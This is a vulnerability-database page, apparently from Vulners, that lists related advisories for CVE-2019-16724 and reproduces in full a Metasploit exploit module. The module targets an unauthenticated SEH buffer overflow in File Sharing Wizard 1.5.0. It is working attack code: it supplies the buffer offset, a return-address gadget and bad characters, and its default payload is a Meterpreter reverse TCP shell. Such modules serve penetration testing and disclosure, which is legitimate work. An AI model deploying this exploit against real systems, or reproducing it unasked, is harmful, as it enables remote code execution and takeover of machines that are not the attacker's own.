Lucene search
+L

File Sharing Wizard - POST SEH Overflow

🗓️ 24 Sep 2019 00:00:00Reported by x00pwn, Dean Welch <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 30 Views

File Sharing Wizard - POST SEH Overflow. Exploits unauthenticated HTTP POST SEH-based buffer overflow in File Sharing Wizard 1.5.0

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
File Sharing Wizard 1.5.0 - POST SEH Overflow Exploit
26 Sep 201900:00
zdt
circl
Circl
CVE-2019-16724
8 Oct 201915:50
circl
cnvd
CNVD
File Sharing Wizard Buffer Overflow Vulnerability
25 Sep 201900:00
cnvd
checkpoint_advisories
Check Point Advisories
iSharer and upRedSun File Sharing Wizard Buffer Overflow (CVE-2019-16724)
20 Nov 202200:00
checkpoint_advisories
cve
CVE
CVE-2019-16724
24 Sep 201920:21
cve
cvelist
Cvelist
CVE-2019-16724
24 Sep 201920:21
cvelist
exploitdb
Exploit DB
File Sharing Wizard 1.5.0 - POST SEH Overflow
24 Sep 201900:00
exploitdb
exploitpack
exploitpack
File Sharing Wizard 1.5.0 - POST SEH Overflow
24 Sep 201900:00
exploitpack
nvd
NVD
CVE-2019-16724
24 Sep 201921:15
nvd
osv
OSV
CVE-2019-16724
24 Sep 201921:15
osv
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'File Sharing Wizard - POST SEH Overflow',
        'Description' => %q{
          This module exploits an unauthenticated HTTP POST SEH-based buffer overflow in File Sharing Wizard 1.5.0.
        },
        'Author' => [
          'x00pwn', # Original exploit
          'Dean Welch <dean_welch[at]rapid7.com>' # Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          %w[CVE 2019-16724],
          %w[EDB 47412]
        ],
        'Payload' => {
          'BadChars' => "\x00\x20"
        },
        'DisclosureDate' => '2019-09-24',
        'DefaultOptions' => {
          'RPORT' => 80,
          'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
        },
        'Platform' => 'win',
        'Arch' => [ARCH_X86],
        'Targets' => [
          ['Windows Vista / Windows 7 (x86)', { 'Offset' => 1040, 'Ret' => 0x7c38a67f }] # 0x7c38a67f : pop ecx # pop ecx # ret  |  {PAGE_EXECUTE_READ} [MSVCR71.dll]
        ],
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def check
    res = send_request_cgi
    if res.nil?
      fail_with(Failure::Unreachable, 'Connection timed out.')
    end
    # Checks for the `WWW-Authenticate` header in the response
    if res.code && res.code == 401 && res.headers['WWW-Authenticate'].include?('Basic realm="File Sharing Wizard"')
      CheckCode::Detected('Target service detected')
    else
      CheckCode::Safe('Target is not vulnerable')
    end
  end

  def exploit
    buf = rand_text_english(target['Offset'])
    buf << generate_seh_payload(target.ret)
    print_status('Sending payload to target')
    send_request_raw({ 'method' => 'POST', 'uri' => buf }, 0)
  end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation